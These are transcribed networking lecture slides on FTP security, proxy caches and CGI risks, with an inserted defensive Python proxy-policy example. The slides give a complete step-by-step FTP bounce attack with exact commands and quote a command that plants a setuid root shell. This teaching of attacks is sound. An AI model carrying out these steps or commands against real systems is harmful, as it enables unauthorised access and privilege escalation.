TELE 301 Lecture 17: FTP … 1 Overview Last Lecture –Remote Terminal Services (SSH) This Lecture –File transfer and web caching Next Lecture –Directory.

Presentation transcript:

TELE 301 Lecture 17: FTP … 1
Overview
Last Lecture
  – Remote Terminal Services (SSH)
This Lecture
  – File transfer and web caching
Next Lecture
  – Directory services

TELE 301 Lecture 17: FTP … 2
FTP Basics
Clear-text protocol.
Woefully insecure.
Largely due to its dual-channel nature.
Can be used in a bounce attack (don't trust traffic from your FTP server).
Use sftp or scp mechanisms instead for user-based access.

TELE 301 Lecture 17: FTP … 3
How FTP works?
[Diagram: client and server, joined by a control connection and a data connection]
Command: PORT IP_ADDR PORT_NUM
  – can ask the FTP server to connect to any machine and port

TELE 301 Lecture 17: FTP … 4
Anonymous FTP
Incoming directory
Default guest “password” ( addr.)
Download Accelerators
Run as standalone or inetd
Use HTTP instead

TELE 301 Lecture 17: FTP … 5
FTP bounce attack
Scenario
  – You are a user on foreign.fr, IP address x.x.x.x, and want to retrieve cryptographic source code from crypto.com in the US.
  – The FTP server at crypto.com is set up to allow your connection, but deny access to the crypto sources because your source IP address is that of a non-US site.
  – However, crypto.com will allow ufred.edu to download crypto sources because ufred.edu is in the US too.
  – ufred.edu offers anonymous FTP and has a world-writable /incoming directory for anonymous users to drop files into.
  – Crypto.com's IP address is z.z.z.z.

TELE 301 Lecture 17: FTP … 6
FTP bounce attack (cont.)
[Diagram: control and data connections between Foreign.fr, Ufred.edu and Crypto.com; label: PORT x.x.x.x, yy]

TELE 301 Lecture 17: FTP … 7
Assuming you have an FTP server that does passive mode.
Open an FTP connection to your own machine's real IP address [not localhost] and log in.
Change to a convenient directory that you have write access to, and then do:
  – quote "pasv"
  – quote "stor foobar"
Take note of the address and port that are returned from the PASV command, x.x.x.x, yy.
This FTP session will now hang, so background it or flip to another window or something to proceed with the following.

TELE 301 Lecture 17: FTP … 8
Construct a file containing FTP server commands. Let's call this file "instrs". It will look like this:
  – user ftp
  – pass
  – cwd /export-restricted-crypto
  – type i
  – port x,x,x,x,y,y
  – retr crypto.tar.Z
  – quit
x,x,x,x,y,y is the same address and port that your own machine handed you on the first connection.
The trash at the end is extra lines you create, each containing 250 NULLS and nothing else, enough to fill up about 60K of extra data.
The reason for this filler is to keep the control TCP connection open long enough for the data transfer to finish.

TELE 301 Lecture 17: FTP … 9
Open an FTP connection to ufred.edu, log in anonymously, and cd to /incoming.
Now type the following into this FTP session, which transfers a copy of your "instrs" file over and then tells ufred.edu's FTP server to connect to crypto.com's FTP server using your file as the commands:
  – put instrs
  – quote "port C,C,C,C,0,21"
  – quote "retr instrs"
  – Note C.C.C.C is the IP address of crypto.com
Crypto.tar.Z should now show up as "foobar" on your machine via your first FTP connection.

TELE 301 Lecture 17: FTP … 10
Proxy Cache
Save Bandwidth/Money
Increase Performance – for static pages, multiple clients.
Most useful for images and other objects.
Client configured to send HTTP request via cache server.
FTP is handled also.
Can be auto-configured. (WPAD)

TELE 301 Lecture 17: FTP … 11
HTTP CONNECT Method
Used for relaying (can't cache) encrypted SSL connections.
Cache just passes the connection through.
  CONNECT fnc.asbbank.co.nz:443 HTTP/1.1
Other users: AIM, PuTTY, Corkscrew...
This can be used to circumvent access control, especially if the proxy cache is trusted!

TELE 301 Lecture 17: FTP … 12
Cache Hierarchies
Parent proxies are commonly used, and are very useful when you can tap into a large proxy.
Internet Cache Protocol ICP (UDP, Multicast) can be used to query sibling cache proxies.

TELE 301 Lecture 17: FTP … 13
Non-Caching Proxies
Some proxies provide other features, such as
  – Parental control
  – HTML rewriting
  – Security testing

TELE 301 Lecture 17: FTP … 14
Access Control
You really must restrict access to known clients only.
User-based authentication
Don't use the same password for Proxy as you do for system login (HTTP Basic Auth only.)
Enforce use of Proxy Cache for authentication. (firewall)
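
The CONNECT and Access Control slides together imply a policy a proxy should enforce: serve known clients only, and tunnel only to the port used for SSL. An added example (not from the lecture) of that decision as a function; the client network 10.0.0.0/8, the allowed port set and the function name are assumptions made for illustration.

```python
import ipaddress

# Assumptions for this example: internal clients live in 10.0.0.0/8 and
# only TLS on port 443 may be tunnelled through the proxy.
ALLOWED_CLIENTS = [ipaddress.ip_network("10.0.0.0/8")]
ALLOWED_CONNECT_PORTS = {443}


def decide(request_line, client_ip):
    """Return (status_code, reason) for one proxy request line."""
    client = ipaddress.ip_address(client_ip)
    if not any(client in net for net in ALLOWED_CLIENTS):
        return 403, "client not in allowed networks"

    parts = request_line.split()
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return 400, "malformed request line"
    method, target, _version = parts

    if method != "CONNECT":
        return 200, "not a tunnel request; normal proxy handling"

    # CONNECT targets are host:port; split on the last colon.
    host, sep, port = target.rpartition(":")
    if not sep or not host or not (port.isascii() and port.isdigit()):
        return 400, "CONNECT target must be host:port"
    if int(port) not in ALLOWED_CONNECT_PORTS:
        return 403, "CONNECT to port %s not permitted" % port
    return 200, "tunnel permitted"


if __name__ == "__main__":
    samples = [  # constructed requests
        ("CONNECT fnc.asbbank.co.nz:443 HTTP/1.1", "10.1.2.3"),
        ("CONNECT mail.example.org:25 HTTP/1.1", "10.1.2.3"),
        ("CONNECT fnc.asbbank.co.nz:443 HTTP/1.1", "203.0.113.9"),
    ]
    for line, ip in samples:
        print(ip, line, "->", decide(line, ip))
```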

TELE 301 Lecture 17: FTP … 15
Transparent Proxies
No client configuration, traffic savings.
Attractive to ISPs.
Limitations
  – Cannot use password authentication.
  – HTTP 1.1 – proxy needs to find out what to connect to.
  – Source address will be that of the proxy cache.
  – X-Forwarded-For header (usually not logged)

TELE 301 Lecture 17: FTP … 16
Transparent Proxies
Router / Firewall sits in the path of traffic.
Redirects TCP/80 connections to the proxy server.
Proxy server accepts the request, and using the Host header, finds out whether or not it can satisfy the request from cache or whether it needs to go to the server and get the page.
In smaller setups, proxy and router are on same machine.

TELE 301 Lecture 17: FTP … 17
Reverse Proxies
aka HTTP Accelerators
Uses a Transparent Proxy in front of a dynamic web server.
Essentially a transparent proxy that accepts GET and POST requests from everyone, but forwards them only to a few machines.
Most useful when you have a lot of generated documents that will be the same.

TELE 301 Lecture 17: FTP … 18
SOCKS Proxies
Similar to the CONNECT method, but designed primarily for security, not caching.
Not just for web access, but for any TCP application.
Is a form of a firewall.
Each client application needs SOCKS support, or must be wrapped with a replacement library.

TELE 301 Lecture 17: FTP … 19
Why is CGI not secure?
CGI (Common Gateway Interface) is used to work with web servers
  – But it may cause security holes
Script command
  – `cp /bin/sh /tmp; chmod 4777 /tmp/sh`
If the command is executed by a CGI script, the consequence is obvious. But how could that happen?

TELE 301 Lecture 17: FTP … 20
Resources
Hacking Linux Exposed (2nd Edition), Brian Hatch & James Lee, ISBN
Various useful documents
Transparent Proxy HOWTO

TELE 301 Lecture 17: FTP … 21
Resources
RFC2617 – HTTP Authentication: Basic and Digest...
OWASP – The Open Web Application Security Project
SANS Reading Room